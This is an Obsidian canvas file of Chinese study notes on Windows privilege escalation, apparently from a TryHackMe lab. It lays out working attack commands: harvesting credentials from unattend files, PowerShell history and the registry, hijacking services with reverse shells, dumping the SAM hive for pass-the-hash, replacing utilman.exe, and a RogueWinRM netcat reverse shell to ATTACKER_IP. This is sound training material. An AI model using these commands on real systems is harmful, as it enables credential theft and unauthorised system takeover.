{
	"nodes":[
		{"id":"f3fbe36ad050736e","type":"group","x":-880,"y":5280,"width":2885,"height":900,"label":"滥用危险权限"},
		{"id":"6ac712b3fb2e725d","type":"group","x":-760,"y":1960,"width":1720,"height":1190,"label":"收集密码"},
		{"id":"5f3e9334d677f581","type":"group","x":-760,"y":3720,"width":1150,"height":1420,"label":"利用服务配置错误"},
		{"id":"7464a7561c347502","x":-880,"y":6280,"width":762,"height":1140,"type":"group","label":"资源"},
		{"id":"66b7f2c85a3a91e9","type":"group","x":-760,"y":3240,"width":1660,"height":380,"label":"其他快速获胜"},
		{"id":"3cd0705ceaf1a4bb","type":"text","text":"保存的 Windows 凭据","x":-133,"y":2630,"width":220,"height":60},
		{"id":"deef733ea49b5843","type":"text","text":"type C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\web.config | findstr connectionString\n- C:\\inetpub\\wwwroot\\web.config\n- C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\web.config","x":47,"y":2830,"width":820,"height":120},
		{"id":"a775768b95700da0","type":"text","text":"IIS 配置","x":-218,"y":2830,"width":125,"height":60},
		{"id":"1662f640eae2bab1","type":"text","text":"reg query HKEY_CURRENT_USER\\Software\\SimonTatham\\PuTTY\\Sessions\\ /f \"Proxy\" /s","x":207,"y":3050,"width":700,"height":60},
		{"id":"da81db3c6b13a3be","type":"text","text":"计划任务","x":-360,"y":3260,"width":250,"height":60},
		{"id":"022d1b48db888405","type":"text","text":"详见thm","x":455,"y":3260,"width":250,"height":60},
		{"id":"0da25752141d5b48","type":"text","text":"其他快速获胜","x":-740,"y":3420,"width":250,"height":60},
		{"id":"d35e8286d7e8bf36","type":"text","text":"C:\\> reg query HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\nC:\\> reg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer","x":280,"y":3540,"width":600,"height":60},
		{"id":"18fdf6386f6c67c2","type":"text","text":"始终安装提升","x":-360,"y":3540,"width":180,"height":60},
		{"id":"6b96375a8dbfb0d8","type":"text","text":"启动程序","x":-280,"y":1800,"width":250,"height":60},
		{"id":"e262e2c3ec23ef44","type":"text","text":"收集密码","x":-733,"y":2470,"width":220,"height":60},
		{"id":"dc070b9d9eb4bf0f","type":"text","text":"Powershell历史","x":-93,"y":2410,"width":180,"height":60},
		{"id":"84634df65a0f4963","type":"text","text":"无人值守的 Windows 安装","x":-93,"y":2050,"width":250,"height":60},
		{"id":"ea61ac73e82ad93c","type":"text","text":"type %userprofile%\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadline\\ConsoleHost_history.txt","x":347,"y":2380,"width":560,"height":120},
		{"id":"8943af6c1a863076","type":"text","text":"- C:\\Unattend.xml\n- C:\\Windows\\Panther\\Unattend.xml\n- C:\\Windows\\Panther\\Unattend\\Unattend.xml\n- C:\\Windows\\system32\\sysprep.inf\n- C:\\Windows\\system32\\sysprep\\sysprep.xml","x":347,"y":2000,"width":420,"height":160},
		{"id":"2e32d7911c49da19","type":"text","text":"cmdkey /list","x":222,"y":2570,"width":250,"height":60},
		{"id":"0c5f0a7c5f8f00e1","type":"text","text":"从软件中检索凭据：PuTTY","x":-280,"y":3050,"width":277,"height":60},
		{"id":"4a2f9198bd8721d8","type":"text","text":"runas /savecred /user:admin cmd.exe","x":222,"y":2730,"width":335,"height":60},
		{"id":"9caa3c9763bc123a","type":"text","text":"windows提权","x":-740,"y":1180,"width":250,"height":60},
		{"id":"6eda42fd646b4087","type":"text","text":"内核","x":-280,"y":1180,"width":250,"height":60},
		{"id":"a280e6c3c6360d40","type":"text","text":"注册表","x":-280,"y":920,"width":250,"height":60},
		{"id":"d3a594d7fbdefa43","type":"text","text":"计划任务","x":-280,"y":1640,"width":250,"height":60},
		{"id":"e39b60e94e6de2f5","type":"text","text":"密码","x":-280,"y":1420,"width":250,"height":60},
		{"id":"4bd9d51bfed814c0","type":"text","text":"服务","x":-280,"y":660,"width":250,"height":60},
		{"id":"196005d70ebf4394","type":"text","text":"WinPEAS","x":-455,"y":6300,"width":250,"height":60},
		{"id":"b844102a106a1f74","type":"text","text":"PrivescCheck","x":-455,"y":6493,"width":250,"height":60},
		{"id":"3cb86d2b397aad0c","type":"text","text":"SeBackupPrivilege\nSeRestorePrivilege","x":-35,"y":5525,"width":250,"height":60},
		{"id":"c5a8b0388fa3394f","type":"text","text":"要使用此类帐户提升权限，攻击者需要满足以下条件：\n1. 生成一个进程，以便用户可以连接该进程并对其进行身份验证，以便进行模拟。\n2. 找到一种方法来强制特权用户连接并验证生成的恶意进程。\n使用 RogueWinRM 漏洞来实现这两个条件。","x":5,"y":5920,"width":540,"height":160},
		{"id":"eecfabb786e4f40e","type":"text","text":"使用impacket获取密码hash值\n```bash\npython3.9 /opt/impacket/examples/secretsdump.py -sam sam.hive -system system.hive LOCAL\n```\n利用管理员的哈希值进行 Pass-the-Hash 攻击\n```\npython3.9 /opt/impacket/examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:13a04cdcf3f7ec41264e568127c5ca94 administrator@MACHINE_IP\n```","x":925,"y":5398,"width":600,"height":315},
		{"id":"af548dd7ee716556","type":"text","text":"nc -lvp 4442\nc:\\tools\\RogueWinRM\\RogueWinRM.exe -p \"C:\\tools\\nc64.exe\" -a \"-e cmd.exe ATTACKER_IP 4442\"","x":656,"y":5954,"width":539,"height":92},
		{"id":"c106a2202f4f59e1","type":"text","text":"SeBackup / SeRestore","x":-375,"y":5525,"width":250,"height":60},
		{"id":"21d46d9597d12ff6","type":"text","text":"SeTakeOwnership","x":-375,"y":5700,"width":250,"height":60},
		{"id":"d161bdf48dd6eb22","type":"text","text":"利用工具","x":-860,"y":6553,"width":250,"height":60},
		{"id":"413a178ee70a08b8","type":"text","text":"WES-NG: Windows Exploit Suggester - Next Generation","x":-433,"y":6700,"width":295,"height":80},
		{"id":"11aa0951345fac35","type":"text","text":"Metasploit","x":-433,"y":6940,"width":250,"height":60},
		{"id":"dd41c5ab83dc2212","type":"text","text":"重启服务\nC:\\> sc stop THMService \nC:\\> sc start THMService","x":-600,"y":5000,"width":330,"height":120},
		{"id":"6ac5d9a6d5312195","type":"text","text":"给权限:`icacls C:\\Users\\thm-unpriv\\rev-svc3.exe /grant Everyone:F`","x":-740,"y":4620,"width":610,"height":60},
		{"id":"43b3afc434eec25f","type":"text","text":"whoami /priv","x":25,"y":5300,"width":250,"height":60},
		{"id":"62ec033550d3f157","type":"text","text":"滥用 utilman.exe 来提升权限。Utilman 是一个内置的 Windows 应用程序，用于在锁定屏幕期间提供 Ease of Access 选项","x":25,"y":5700,"width":320,"height":120},
		{"id":"913ac279bf26e6ff","type":"text","text":"备份system\nreg save hklm\\system C:\\Users\\THMBackup\\system.hive\n备份sam\nreg save hklm\\sam C:\\Users\\THMBackup\\sam.hive","x":345,"y":5498,"width":510,"height":115},
		{"id":"7af7db0727c8bbd6","type":"text","text":"要替换 utilman，我们首先使用以下命令获取它的所有权：\ntakeown /f C:\\Windows\\System32\\Utilman.exe","x":545,"y":5730,"width":400,"height":90},
		{"id":"ee56244d3bb62da0","type":"text","text":"要授予用户对 utilman.exe 的完全权限，您可以使用以下命令：\nicacls C:\\Windows\\System32\\Utilman.exe /grant THMTakeOwnership:F","x":1045,"y":5745,"width":460,"height":115},
		{"id":"bb93efc70beda914","type":"text","text":"继续单击“Ease of Access”按钮，该按钮utilman.exe SYSTEM 权限运行。由于我们将其替换为 cmd.exe 副本，因此我们将获得具有 SYSTEM 权限的命令提示符：","x":1645,"y":6020,"width":340,"height":140},
		{"id":"fe6c5cc25bdf8888","type":"text","text":"copy cmd.exe utilman.exe","x":1665,"y":5790,"width":250,"height":60},
		{"id":"ff93337d1fd9a493","type":"text","text":"生成反向shell","x":-559,"y":4460,"width":250,"height":60},
		{"id":"158d4adf25092bc7","type":"text","text":"这个服务的`BINARY_PATH_NAME`是`C:\\MyPrograms\\Disk Sorter Enterprise\\bin\\disksrs.exe`并没有引号括住，所以可以在`C:\\MyPrograms\\`文件夹下构造反弹shell","x":-668,"y":4280,"width":467,"height":120},
		{"id":"b3f3db30ca2eb785","type":"text","text":"检查服务配置和可执行文件的的权限","x":15,"y":4140,"width":320,"height":60},
		{"id":"8de7dd38715adf77","type":"text","text":"服务可执行文件的权限不安全","x":30,"y":3960,"width":290,"height":60},
		{"id":"f41329dbd4b6905b","type":"text","text":"生成反向shell","x":50,"y":4400,"width":250,"height":60},
		{"id":"3cbcdcc2bd929aed","type":"text","text":"重启服务\nC:\\> sc stop windowsscheduler \nC:\\> sc start windowsscheduler","x":10,"y":4720,"width":330,"height":120},
		{"id":"ed697aa4e506b94e","type":"text","text":"更改服务的关联可执行文件和账户:`sc config THMService binPath= \"C:\\Users\\thm-unpriv\\rev-svc3.exe\" obj= LocalSystem`","x":-675,"y":4780,"width":480,"height":100},
		{"id":"8996df894d32b422","type":"text","text":"查看当前用户权限","x":-375,"y":5300,"width":250,"height":60},
		{"id":"9ae4d0926e56a8cd","type":"text","text":"滥用危险权限","x":-860,"y":5500,"width":250,"height":50},
		{"id":"98c984abe5f209b6","type":"text","text":"SeImpersonate / SeAssignPrimaryToken","x":-395,"y":5920,"width":250,"height":60},
		{"id":"95b86bc564f7f025","type":"text","text":"用生成的反向shell替换这个服务的可执行文件","x":50,"y":4540,"width":250,"height":80},
		{"id":"4dac41d5aa8b3841","type":"text","text":"未加引号的服务路径","x":-560,"y":3960,"width":250,"height":60},
		{"id":"f2ee739272598516","type":"text","text":"sc qc \"disk sorter enterprise\"","x":-590,"y":4140,"width":310,"height":60},
		{"id":"7144ca3d0d0dfda5","type":"text","text":"sc qc WindowsScheduler\nicacls C:\\PROGRA~2\\SYSTEM~1\\WService.exe","x":-20,"y":4240,"width":390,"height":80},
		{"id":"c0fdf4e3d8650b77","type":"text","text":"滥用服务配置错误","x":-290,"y":3740,"width":250,"height":60},
		{"id":"023427939a645269","type":"text","text":"原理详见thm","x":-250,"y":4020,"width":170,"height":60},
		{"id":"a7bcbb887b5fd78e","type":"text","text":"在这个房间里，我们介绍了 Windows 系统中可用的几种权限提升技术。这些技术应该为您提供有关攻击者可以采用的最常见路径来提升系统权限的可靠背景。如果您有兴趣了解其他技术，可以使用以下资源：\n- [PayloadsAllTheThings - Windows Privilege Escalation](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md)\n- [Priv2Admin - Abusing Windows Privileges](https://github.com/gtworek/Priv2Admin)\n- [RogueWinRM Exploit](https://github.com/antonioCoco/RogueWinRM)\n- [Potatoes](https://jlajara.gitlab.io/others/2020/11/22/Potatoes_Windows_Privesc.html)\n- [Decoder's Blog](https://decoder.cloud/)\n- [Token Kidnapping](https://dl.packetstormsecurity.net/papers/presentations/TokenKidnapping.pdf)\n- [Hacktricks - Windows Local Privilege Escalation](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation)","x":-848,"y":7040,"width":665,"height":360}
	],
	"edges":[
		{"id":"1ed4dcad3520e2cb","fromNode":"9caa3c9763bc123a","fromSide":"right","toNode":"4bd9d51bfed814c0","toSide":"left"},
		{"id":"d27dc0145e41cebf","fromNode":"9caa3c9763bc123a","fromSide":"right","toNode":"6eda42fd646b4087","toSide":"left"},
		{"id":"f88d3d452ded201f","fromNode":"9caa3c9763bc123a","fromSide":"right","toNode":"a280e6c3c6360d40","toSide":"left"},
		{"id":"c48c1cedae0e3167","fromNode":"9caa3c9763bc123a","fromSide":"right","toNode":"e39b60e94e6de2f5","toSide":"left"},
		{"id":"7aa21f471dfdfe16","fromNode":"9caa3c9763bc123a","fromSide":"right","toNode":"d3a594d7fbdefa43","toSide":"left"},
		{"id":"6351b21ec4803d08","fromNode":"9caa3c9763bc123a","fromSide":"right","toNode":"6b96375a8dbfb0d8","toSide":"left"},
		{"id":"79b9f98e261b1c78","fromNode":"e262e2c3ec23ef44","fromSide":"right","toNode":"84634df65a0f4963","toSide":"left"},
		{"id":"c6dc05884cbd179c","fromNode":"84634df65a0f4963","fromSide":"right","toNode":"8943af6c1a863076","toSide":"left"},
		{"id":"4915b2bf3efd9e5f","fromNode":"e262e2c3ec23ef44","fromSide":"right","toNode":"dc070b9d9eb4bf0f","toSide":"left"},
		{"id":"505e84d469e5ba58","fromNode":"dc070b9d9eb4bf0f","fromSide":"right","toNode":"ea61ac73e82ad93c","toSide":"left"},
		{"id":"67476c42a16eb582","fromNode":"e262e2c3ec23ef44","fromSide":"right","toNode":"3cd0705ceaf1a4bb","toSide":"left"},
		{"id":"7bf660d656301d58","fromNode":"3cd0705ceaf1a4bb","fromSide":"right","toNode":"2e32d7911c49da19","toSide":"left"},
		{"id":"5f4197f5b1a02dff","fromNode":"3cd0705ceaf1a4bb","fromSide":"right","toNode":"4a2f9198bd8721d8","toSide":"left"},
		{"id":"dc9b64631c4bdc9e","fromNode":"e262e2c3ec23ef44","fromSide":"right","toNode":"a775768b95700da0","toSide":"left"},
		{"id":"2d3fa62a8a1cdefe","fromNode":"a775768b95700da0","fromSide":"right","toNode":"deef733ea49b5843","toSide":"left"},
		{"id":"720db9b3a496f406","fromNode":"e262e2c3ec23ef44","fromSide":"right","toNode":"0c5f0a7c5f8f00e1","toSide":"left"},
		{"id":"5a98d5d46bd53b23","fromNode":"0c5f0a7c5f8f00e1","fromSide":"right","toNode":"1662f640eae2bab1","toSide":"left"},
		{"id":"3ea517b2ffc1f9e0","fromNode":"0da25752141d5b48","fromSide":"right","toNode":"da81db3c6b13a3be","toSide":"left"},
		{"id":"6e05d9688c3ce05a","fromNode":"0da25752141d5b48","fromSide":"right","toNode":"18fdf6386f6c67c2","toSide":"left"},
		{"id":"77206e387d5c37df","fromNode":"18fdf6386f6c67c2","fromSide":"right","toNode":"d35e8286d7e8bf36","toSide":"left","label":"查找两个注册表值"},
		{"id":"bceaac909eb7cebc","fromNode":"da81db3c6b13a3be","fromSide":"right","toNode":"022d1b48db888405","toSide":"left"},
		{"id":"0da043848a5cab5a","fromNode":"d35e8286d7e8bf36","fromSide":"top","toNode":"022d1b48db888405","toSide":"bottom"},
		{"id":"edee0264a386b1ff","fromNode":"c0fdf4e3d8650b77","fromSide":"bottom","toNode":"8de7dd38715adf77","toSide":"top"},
		{"id":"38ce81199478754d","fromNode":"c0fdf4e3d8650b77","fromSide":"bottom","toNode":"4dac41d5aa8b3841","toSide":"top"},
		{"id":"b909f6f57fef0ca2","fromNode":"f41329dbd4b6905b","fromSide":"bottom","toNode":"95b86bc564f7f025","toSide":"top"},
		{"id":"646200fae78be76c","fromNode":"95b86bc564f7f025","fromSide":"bottom","toNode":"3cbcdcc2bd929aed","toSide":"top"},
		{"id":"24ee87cab21e6ea9","fromNode":"7144ca3d0d0dfda5","fromSide":"bottom","toNode":"f41329dbd4b6905b","toSide":"top"},
		{"id":"78dd9947f9cd39a0","fromNode":"8de7dd38715adf77","fromSide":"bottom","toNode":"b3f3db30ca2eb785","toSide":"top"},
		{"id":"54c949b2bb7da68a","fromNode":"b3f3db30ca2eb785","fromSide":"bottom","toNode":"7144ca3d0d0dfda5","toSide":"top"},
		{"id":"0a59576c8402bcd5","fromNode":"8de7dd38715adf77","fromSide":"left","toNode":"023427939a645269","toSide":"top"},
		{"id":"20ccb4a8ab0c1664","fromNode":"4dac41d5aa8b3841","fromSide":"right","toNode":"023427939a645269","toSide":"top"},
		{"id":"76240294c1505d70","fromNode":"4dac41d5aa8b3841","fromSide":"bottom","toNode":"f2ee739272598516","toSide":"top"},
		{"id":"50a539e244e3bcbb","fromNode":"f2ee739272598516","fromSide":"bottom","toNode":"158d4adf25092bc7","toSide":"top"},
		{"id":"d81a6d0b69d17ce8","fromNode":"158d4adf25092bc7","fromSide":"bottom","toNode":"ff93337d1fd9a493","toSide":"top"},
		{"id":"1ad462d2111f3b8d","fromNode":"ff93337d1fd9a493","fromSide":"bottom","toNode":"6ac5d9a6d5312195","toSide":"top"},
		{"id":"b65bda1023cf5287","fromNode":"6ac5d9a6d5312195","fromSide":"bottom","toNode":"ed697aa4e506b94e","toSide":"top"},
		{"id":"5c22ec23db069490","fromNode":"ed697aa4e506b94e","fromSide":"bottom","toNode":"dd41c5ab83dc2212","toSide":"top"},
		{"id":"3c39985c62b19125","fromNode":"9ae4d0926e56a8cd","fromSide":"right","toNode":"8996df894d32b422","toSide":"left"},
		{"id":"c32efa01ecbd0029","fromNode":"8996df894d32b422","fromSide":"right","toNode":"43b3afc434eec25f","toSide":"left"},
		{"id":"4905969d8bc26737","fromNode":"9ae4d0926e56a8cd","fromSide":"right","toNode":"c106a2202f4f59e1","toSide":"left"},
		{"id":"f313fc3fd707e474","fromNode":"9ae4d0926e56a8cd","fromSide":"right","toNode":"21d46d9597d12ff6","toSide":"left"},
		{"id":"bb53c84983f272f8","fromNode":"9ae4d0926e56a8cd","fromSide":"right","toNode":"98c984abe5f209b6","toSide":"left"},
		{"id":"a524644a140a8238","fromNode":"c106a2202f4f59e1","fromSide":"right","toNode":"3cb86d2b397aad0c","toSide":"left"},
		{"id":"ce59d479ccc39325","fromNode":"3cb86d2b397aad0c","fromSide":"right","toNode":"913ac279bf26e6ff","toSide":"left"},
		{"id":"02ee802af4d1b7a2","fromNode":"913ac279bf26e6ff","fromSide":"right","toNode":"eecfabb786e4f40e","toSide":"left"},
		{"id":"5605b8bc99b55ad6","fromNode":"21d46d9597d12ff6","fromSide":"right","toNode":"62ec033550d3f157","toSide":"left"},
		{"id":"03f7937fba96a8e7","fromNode":"62ec033550d3f157","fromSide":"right","toNode":"7af7db0727c8bbd6","toSide":"left"},
		{"id":"e71e8b47c1d2742f","fromNode":"7af7db0727c8bbd6","fromSide":"right","toNode":"ee56244d3bb62da0","toSide":"left"},
		{"id":"a147c439b475337c","fromNode":"ee56244d3bb62da0","fromSide":"right","toNode":"fe6c5cc25bdf8888","toSide":"left"},
		{"id":"32d52b4e82f01830","fromNode":"fe6c5cc25bdf8888","fromSide":"bottom","toNode":"bb93efc70beda914","toSide":"top"},
		{"id":"f6dc8c7e1f1b3562","fromNode":"98c984abe5f209b6","fromSide":"right","toNode":"c5a8b0388fa3394f","toSide":"left"},
		{"id":"3f995f2b2910c366","fromNode":"c5a8b0388fa3394f","fromSide":"right","toNode":"af548dd7ee716556","toSide":"left"},
		{"id":"f7387e969f205a00","fromNode":"d161bdf48dd6eb22","fromSide":"right","toNode":"196005d70ebf4394","toSide":"left"},
		{"id":"a4deb93fe7743533","fromNode":"d161bdf48dd6eb22","fromSide":"right","toNode":"b844102a106a1f74","toSide":"left"},
		{"id":"3491bc18c77d7f8f","fromNode":"d161bdf48dd6eb22","fromSide":"right","toNode":"413a178ee70a08b8","toSide":"left"},
		{"id":"e51613a698ddc56a","fromNode":"d161bdf48dd6eb22","fromSide":"right","toNode":"11aa0951345fac35","toSide":"left"}
	]
}